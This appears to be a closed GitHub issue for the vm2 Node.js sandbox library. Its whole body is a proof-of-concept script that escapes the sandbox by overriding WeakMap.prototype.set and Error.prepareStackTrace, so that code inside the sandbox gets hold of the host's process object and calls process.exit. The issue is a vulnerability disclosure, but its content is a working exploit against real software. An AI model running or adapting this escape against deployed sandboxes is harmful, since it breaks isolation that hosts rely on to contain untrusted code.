-
Notifications
You must be signed in to change notification settings - Fork 312
Closed
Description
const { VM } = require('vm2');
new VM().run(`
const { set } = WeakMap.prototype;
WeakMap.prototype.set = function(v) {
return set.call(this, v, v);
};
Error.prepareStackTrace =
Error.prepareStackTrace =
(_, c) => c.map(c => c.getThis()).find(a => a);
const { stack } = new Error();
Error.prepareStackTrace = undefined;
stack.process.exit(1);
`);
// Never gets executed.
console.log('Finished');Metadata
Metadata
Assignees
Labels
No labels